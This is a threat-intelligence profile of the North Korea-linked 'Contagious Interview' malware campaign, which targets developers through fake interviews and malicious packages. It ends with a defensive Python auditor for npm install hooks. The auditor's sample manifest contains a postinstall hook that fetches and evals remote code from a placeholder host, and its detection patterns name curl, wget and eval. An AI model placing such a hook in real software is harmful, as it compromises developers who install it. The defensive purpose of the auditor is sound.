Contagious Interview
Contagious Interview is a North Korea-linked malware campaign, tracked as a cluster rather than a single tool, associated with staged payload delivery, malicious GitHub infrastructure, and software supply-chain abuse across multiple ecosystems. The source material ties it to DPRK activity and names the related malware families BeaverTail and OmniStealer. Cited reporting describes the campaign as operating at scale: hundreds of malicious packages, fake LinkedIn profiles, rotating C2 servers, and interview-themed lures. It has been observed on npm and, in broader reporting, across five ecosystems: npm, PyPI, Go, Rust, and PHP/Packagist. The campaign has also been referenced in GitLab disruption reporting that covered malware distribution and fraudulent IT worker operations.
Behaviorally, the source material states that Contagious Interview C2 endpoints inspect IP geolocation, request headers, victim environment details, and runtime conditions before delivering payloads, which indicates selective payload staging and victim validation; a detonation from an unexpected geography or environment may therefore not receive the same payload as a targeted victim. Operators have also instructed victims to disable Docker and other container environments, defeating container isolation and improving infection success. Additional referenced reporting indicates post-compromise tampering with MetaMask wallets. Splunk threat-context mapping in the source material associates the campaign with ATT&CK technique T1567 (Exfiltration Over Web Service), indicating web-based exfiltration as an observed behavior.
The source material further places Contagious Interview among recent software supply-chain compromises, both malicious packages and compromises of legitimate packages, with emphasis on credential theft, CI/CD token theft, and propagation through trusted developer ecosystems. High-confidence indicators in the source material are limited to campaign characteristics rather than concrete IOCs: malicious GitHub accounts and infrastructure, rotating C2 servers, fake LinkedIn personas, malicious packages across multiple package registries, C2-side geolocation and environment filtering, and victim instructions to disable Docker/container protections.
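The interview lures and malicious npm packages described above get code to run at install time through npm lifecycle hooks, so a defender-side triage step is to read a take-home repository's package.json before running npm install. The following is an added example, not code from the source material or from any vendor; the heuristic labels, the hook list and the sample manifest are assumptions constructed for illustration.

```python
import json
import re

# Lifecycle hooks npm runs automatically on "npm install" (prepare also runs on a bare local install).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Reviewer heuristics (assumed, not a signature set): what to surface before anything executes.
SUSPECT = {
    "remote fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|fetch\(|https?://)", re.I),
    "inline eval": re.compile(r"\bnode\s+-e\b|\beval\(|new Function\(", re.I),
    "base64 decode": re.compile(r"base64|atob\(|Buffer\.from\(", re.I),
    "docker/container tamper": re.compile(r"\bdocker\b|/var/run/docker\.sock|cgroup", re.I),
}


def audit_package_json(text: str) -> list[dict]:
    """Return one finding per install-time hook present in a package.json document.

    Each finding carries the hook name, its command and the heuristic labels that
    matched, so a reviewer can decide before 'npm install' runs anything.
    """
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        labels = [name for name, pat in SUSPECT.items() if pat.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "labels": labels})
    return findings


# Constructed sample: a take-home repo manifest whose postinstall hook pulls and
# evaluates remote code (illustrative only; example.invalid is a reserved placeholder).
SAMPLE = """{
  "name": "interview-task",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \\"fetch('https://example.invalid/p').then(r=>r.text()).then(eval)\\""
  }
}"""

if __name__ == "__main__":
    for f in audit_package_json(SAMPLE):
        print(f"{f['hook']}: {f['command']}\n  flags: {', '.join(f['labels']) or 'none'}")
```

Run it against the cloned repository's manifest inside an isolated environment; a hook that matches no heuristic is still worth reading by hand, since the point is to review install-time code before it runs.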
Recent activity
A North Korea-linked cross-ecosystem campaign spanning npm, PyPI, Go, Rust, and Packagist that delivered staged RAT payloads through software package ecosystems.
Referenced as the named operation/campaign discussed in the post title; no technical malware functionality is described in the provided content.
Malware used in North Korea-linked campaigns targeting software developers, associated with credential theft and enabling remote control of devices.
Contagious Interview is referenced in the detection annotations as malware or campaign-related malware associated with exfiltration over web services.